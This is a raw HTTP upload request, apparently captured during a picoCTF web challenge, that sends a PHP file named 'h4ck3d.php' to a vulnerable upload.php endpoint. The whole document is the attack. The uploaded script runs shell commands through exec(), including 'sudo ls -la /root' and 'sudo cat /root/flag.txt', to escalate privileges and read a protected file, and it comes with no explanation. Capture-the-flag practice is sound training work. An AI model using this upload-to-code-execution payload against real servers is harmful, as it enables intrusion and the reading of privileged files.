POST /upload.php HTTP/1.1
Host: standard-pizzas.picoctf.net:58878
Content-Length: 2388
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://standard-pizzas.picoctf.net:51772
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryw7vT3HahFB3StFhA
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://standard-pizzas.picoctf.net:51772/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryw7vT3HahFB3StFhA
Content-Disposition: form-data; name="fileToUpload"; filename="h4ck3d.php"
Content-Type: text/x-shellscript

<?php
// A safer alternative that displays system information
echo "<h2>System Information</h2>";
echo "<pre>";
echo "PHP Version: " . phpversion() . "\n";
echo "Server Software: " . $_SERVER['SERVER_SOFTWARE'] . "\n";
echo "Server OS: " . php_uname('s') . " " . php_uname('r') . "\n";
echo "Server Name: " . php_uname('n') . "\n";
echo "</pre>";

// PHP script to list files in /root directory using sudo
echo "<h2>Files in /root directory</h2>";
echo "<pre>";

// Use exec with sudo to run the ls command on /root
$command = 'sudo ls -la /root';
$output = array();
$return_var = 0;

exec($command, $output, $return_var);

// Check if the command was successful
if ($return_var === 0) {
    echo "Command executed successfully:\n\n";
    foreach ($output as $line) {
        echo htmlspecialchars($line) . "\n";
    }
} else {
    echo "Error executing command. Return code: $return_var\n";
    echo "This could be due to:\n";
    echo "- PHP not having permission to run sudo\n";
    echo "- sudo requiring a password\n";
    echo "- sudo not being configured for this command\n";
}

echo "</pre>";


// PHP script to display the contents of /root/flag.txt using sudo
echo "<h2>Contents of /root/flag.txt</h2>";
echo "<pre>";

// Use exec with sudo to read the file
$command = 'sudo cat /root/flag.txt';
$output = array();
$return_var = 0;

exec($command, $output, $return_var);

// Check if the command was successful
if ($return_var === 0) {
    if (empty($output)) {
        echo "File exists but appears to be empty.";
    } else {
        echo "File contents:\n\n";
        foreach ($output as $line) {
            echo htmlspecialchars($line) . "\n";
        }
    }
} else {
    echo "Error executing command. Return code: $return_var\n";
    echo "This could be due to:\n";
    echo "- The file /root/flag.txt does not exist\n";
    echo "- PHP not having permission to run sudo\n";
    echo "- sudo requiring a password\n";
    echo "- sudo not being configured for this command\n";
}

echo "</pre>";
?>


------WebKitFormBoundaryw7vT3HahFB3StFhA
Content-Disposition: form-data; name="submit"

Upload File
------WebKitFormBoundaryw7vT3HahFB3StFhA--
